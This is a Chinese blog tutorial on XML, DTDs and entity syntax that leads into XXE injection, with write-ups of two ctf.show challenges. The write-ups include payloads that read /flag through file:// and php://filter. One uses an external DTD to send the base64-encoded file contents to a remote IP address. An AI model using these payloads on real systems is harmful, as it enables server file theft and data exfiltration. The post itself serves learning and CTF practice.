XXE原理

最新推荐文章于 2024-05-20 17:20:00 发布
最新推荐文章于 2024-05-20 17:20:00 发布
阅读量154 收藏
点赞数 5
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yxzrw_TW/article/details/134521201
版权

目录

XML

定义

基础语法

DTD

文档声明

内部文档声明

外部文档声明

实体声明

引用实体

内部声明

外部声明

参数实体

内部实体

字符实体

XXE

xml支持的协议

例题

Web373

Web374

XML

定义

可扩展标记语言,主要用来传输信息的,而超文本标记语言(html)是用来展示的

基础语法

  1. 文件后缀为xml

  2. 文件头部声明

<?xml version-"1.0" encoding="UTF-8"?>

  1. 唯一根元素

<?xml version="1.0" encoding="utf-8" ?>
<student>
    <name>
        <EN>makka_pakka</EN>
        <CN language="中文">hello,world</CN>
    </name>
    <age>18</age>
    <sex>man</sex>
</student>

student就是根元素

注意:元素属性必须要用引号括住,就如CN元素的属性language

  1. 大小写敏感,且标签必须闭合

  2. PHP读取xml文档

<?php
    # 在PHP中,DOM是一种解析XML和HTML文档的方式
    $dom = new DOMDocument(); // 实例化 DOMDocument ,创建DOM文档对象
    $dom -> load('xml.xml'); // 加载 xml 文件
    $name = $dom -> getElementsByTagName('name'); // 标签名获取 name 节点
    echo $name -> item(0) -> nodeValue; // nodeValue 获取文本内容
    $CN = $dom -> getElementsByTagName('CN');
    echo $CN -> item(0) -> getAttribute('language'); // 获取属性值
?>

DTD

DTD的全称为Document Type Definition,是一种文件定义格式。 DTD规定了XML文件结构为XML文件提供了语法与规则。 在DTD中定义XML文件的结构,然后按照DTD的声明来编写XML文件。就好像编程语言中的函数定义,在使用函数时要根据函数声明的格式进行来引用。 PS:简而言之,DTD就是用来约束XML文档的

文档声明

声明放在<?DOCTYPE 根元素[] ?>中

eg.

<?xml version="1.0" encoding="utf-8" ?>
        <!DOCTYPE student[   <!--声明根元素为student -->
                <!ELEMENT student (name,age,sex)> <!--定义 student 元素有三个元        
                      素:"name,age,sex"-->
                <!ELEMENT age    (#PCDATA)> <!--定义 age 元素为 "#PCDATA" 类型-->
                ]>
<student>
    <name>
        <EN>makka_pakka</EN>
        <CN language="中文">hello,world</CN>
    </name>
    <age>18</age>
    <sex>man</sex>
</student>

内部文档声明

就是将DOCTYPE声明直接放在xml文件中,如上面那个

外部文档声明

就是将文档声明放在xml文件之外

文档声明文件后缀为 dta, eg. test.dtd, 如果要使用就在xml文件中导入dtd文件

<!DOCTYPE root-element SYSTEM "filename">

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE student SYSTEM "student.dtd"> <!--将student.dtd导入-->
<student>
    <name>
        <EN>makka_pakka</EN>
        <CN language="中文">hello,world</CN>
    </name>
    <age>18</age>
    <sex>man</sex>
</student>

实体声明

在xml中,实体就相当于变量,分为引用实体和参数实体

引用实体,必须在内部DTD文档中定义,不仅仅可以在xml内部使用,而且可以在DTD部分使用,就像全局变量

参数实体 ,只可以在DTD部分进行使用,就像局部变量

引用实体

语法:<!ENTITY 实体名称 "实体的值">

xml中引用:&实体名称;

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE student[
        <!ELEMENT student (name)>
        <!ELEMENT name  (#PCDATA)   >
        <!ENTITY name "hello,world">
        ]>
<student>
    <name>&name;</name>
</student>
<!--输出-->
<student>
<name>hello,world</name>
</student>
内部声明

就是直接在xml文档中声明,如上

外部声明

在xml源文件外的dtd文档中声明的

语法:<!ENTITY 实体名称 SYSTEM "file">

参数实体

语法:<!ENTITY % name1 "<!ENTITY name 'hello,world'>"> (%和实体名之间的空格不能少)(参数实体的值是字符串,所以某些字符要用字符实体替换)

引用: %实体名;

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE student[
        <!ELEMENT student (name)>
        <!ELEMENT name  (#PCDATA)   >
        <!ENTITY % name1  "<!ENTITY name 'hello,world'>">
        %name1;  
        ]>
<student>
    <name>&name;</name>
</student>
 %name1; ->  <!ENTITY name 'hello,world'>

内部实体

就是系统预留的实体

&lt(后面都有个分号)<less than
&gt>greater than
&amp&ampersand
&apos'apostrophe
&quot"quotation mark
字符实体

xml规定字符串中某些字符要用字符实体替换

指用十进制格式(&#aaa;)或十六进制格式(&#xaaa;)来指定任意 Unicode 字符。对 XML 解析器而言,字符实体与直接输入指定字符的效果完全相同。

eg.(到bp用html编码加密)

% -> $#x25

XXE

XML外部实体注入。通过 XML 实体,”SYSTEM”关键词导致 XML 解析器可以从本地文件或者远程 URI 中读取数据。所以攻击者可以通过 XML 实体传递自己构造的恶意值,是处理程序解析它。当引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。

xml支持的协议

Libxml2PHPJava.NET
filefilehttpfile
httphttphttpshttp
ftpftpftphttps
phpfileftp
compress.zlibjar
compress.bzip2netdoc
datamailto
glob

例题

Web373

题目:ctf.show

<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);    

libxml_disable_entity_loader

由于这里是false,所以就可以加载外部实体——>xxe

构造payload:(用post传参)

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE a[<!ENTITY b SYSTEM "file:///flag">]>
<b>
  <ctfshow>&b;</ctfshow>
</b>

Web374

题目:ctf.show

与373相比没有了回显,无回显可以用参数实体外带数据()

libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}

思路:

  • file->用PHP伪协议读文件

  • 访问vps的dtd文件

payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % remote SYSTEM "http://127.0.0.1:8081/xxe.dtd">
%remote;%dtd;%send;
]>

xxe.dtd

<!ENTITY % dtd "<!ENTITY &#37; send SYSTEM 'http://47.113.146.206:9000?pass=%file;'>">

% 用 &#37 因为 xml 规定 字符串里面某些符号要用字符实体替换。

为什么这里我们要导入外部实体,为什么不直接内部来读呢

<!DOCTYPE root [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % remote SYSTEM "http://127.0.0.1:8081?pass=%file;">
%remote
]>

因为XML文档中规定,在DTD内部子集中的参数实体调用 不能够混杂到标记语言中。但是XML规范还声明了一点:外部实体不受此限制。

如有错误,敬请指出

yxzrw_TW
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XXE原理简介、防御方案
qq_37432174的博客
11-24 6433
某些应用程序允许XML 格式的数据输入和解析,可以通过引入外部实体的方式进行攻击。,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。
2021-03-28-xxe原理及利用
qq_50963064的博客
11-16 349
XML基础知识 什么是XML XML 指可扩展标记语言(EXtensible Markup Language)。 XML 是一种标记语言,很类似HTML。 XML 的设计宗旨是传输数据,而非显示数据。 XML 标签没有被预定义,您需要自行定义标签。 XML 被设计为具有自我描述性。 XML 是 W3C 的推荐标准。 特点: XML仅仅是纯文本,它不会做任何事情。 XML可以自己发明标签(允许定义自己的标签和文档结构)。 XML无处不在。XML是各种应用程序之间进行数据传输的最常用的工具,并且在信息存储和描述
XXE原理及利用防御
MAPLE102424的博客
05-15 306
XXE 漏洞全称XML External Entity Injection,即 xml 外部实体注入漏洞,XXE 漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
XXE漏洞原理
Playwin
03-02 4054
XXE漏洞是XML外部实体注入漏洞,那什么是外部实体呢? XML DTD 1、文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。 2、DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 Ps:第二条是重点,也是XXE漏洞产生的原因,DTD可以定义外部实体并引用 DTD语法 若DTD要在XML文档中使用,他需要包含在·DOCTYPE声明...
XXE原理利用防御
Key_book(句芒安全实验室)
06-30 4424
XML外部实体(XXE) 1.何为XXEXXE是xml外部实体注入. 说到这里简单介绍下什么是xml,xml是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言.xml文档结构包括xml声明、DTD文档类型定义(可选)、文档元素. 所有的XML文档均有以下简单的构建模块组成: ·元素(元素是XML以及HTML文档的...
XXE原理,利用与修复详解
GalaxySpaceX的博客
07-20 995
XXE原理+利用+修复
XXE 原理漏洞详解
灰太的表格的博客
04-03 647
XXE 原理漏洞详解 1 什么是XXE漏洞 XXE漏洞全程XML External Entity Injection 即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取,命令执行 内网端口扫描 攻击内网网站 发起DOS攻击等危害 可以类比SQL注入解析传入SQL语句,解析XML语句 2 什么是XML 一种类似html的语...
XXE原理利用与防御
安全大白
04-19 494
0x00 前言 一个认真搞安全的Student,博客用于学习总结,欢迎大家交流指出不足。 ***更欢迎大家去我的博客提出意见:***xiao’s blog 0x01 XXE原理 在讲XXE之前,先了解一下XML的结构 XXE即XML实体注入,漏洞主要发生在XML的DTD部分,关键字SYSTEM能够读取URI里面的内容,将读取到的内容赋值到实体中,XML在使用的过程中,将实体输出,从而产生漏洞。P...
xxe原理解析
d59hao的博客
05-05 127
ENTITY % test SYSTEM “http://your.web.server/test">的作用是引入在外部服务器上的实体,因为在本地的解释器中有可能不允许使用外部连接,即实体定义中不允许参数实体。引用程序在解析XML时,如果没有禁止外部实体的加载,理论上可以加载外部文件(操作系统层面的文件),可以造成文件读取,命令执行,内网端口扫描等。注意这里接受的是XML数据,所以我们可以自己尝试构建实体,如果后台没有合理的解析参数,就有可以造成XXE漏洞。在php中,引用外部实体和libxml库有关系。
XXE 原理漏洞详解.md
04-03
XXE原理漏洞,易懂。
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞的利用方式。 【想要搭建vulnhub内靶场可关注博主,然后私聊我哦】 同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站...
XXE超详细讲解 全网仅此一份
07-06
本文教大家了解XXE漏洞,原理及其他 新手小白一定要来看看
HIN2xxE系列RS-232收发器的原理及应用
12-13
文中主要介绍HIN2xxE系列电路的原理、特性和典型应用。  关键词:RS-232 电荷泵 关断模式 1 概述 Intersil公司的HIN2xxE系列RS-232发送器/接收器包括HIN202E、HIN206E、HIN207E、HIN208E、HIN211E、HIN213E、HIN...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8230
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
HCIP-Datacom-ARST自选题库_02_网络安全【道题】
2301_80961833的博客
05-20 477
为了防止黑客通过MAC地址攻击用户设备或网络,可将非信任用户的MAC地址配置为黑洞MAC地址,过滤掉非法MAC地址。中间人攻击或IP/MAC Spoofing攻击都会导致信息泄露等危害,且在内网中比较常见,为了防止中间人攻击或IP/MACSpoofing攻击,可以采取以下哪些配置手段?多远题461/805、为了防止仿冒DHCP服务器接入网络,可以在交换机上开启DHCP Snooping功能,配置步骤包括以下哪些选项?开启DHCP Snooping检查DHCP REQUEST报文中CHADDR字段的功能。
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 580
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 359
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
Upstream最新发布2024年汽车网络安全报告-百度网盘下载
最新发布
qq_18209847的博客
05-20 136
Levy总结道:“在负责保护车队、电动汽车充电站和基础设施的网络安全利益相关者中,对汽车网络安全的重要性日益增加。特别是在GenAI日益普及的情况下,其降低了黑帽子行为者的进入门槛,使他们能够比以往更快、更有效地进行大规模攻击。这份报告的第六版着重介绍了汽车网络安全的拐点:从实验性的黑客攻击发展到规模庞大的攻击,并产生了怎样的影响。另外今年的报告还提供了关于网络攻击的财务影响的独到见解,它提供了一个可操作的框架,用于在现实场景中衡量网络攻击的货币影响。
xxe漏洞原理及防御方式
05-25
XXE漏洞的原理是通过在XML文档中插入恶意实体来触发解析器加载恶意实体,从而发起攻击。 以下是XXE漏洞的防御方式: 1.禁止使用外部实体:在解析XML文档时,应该禁止使用外部实体,避免攻击者利用外部实体来读取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值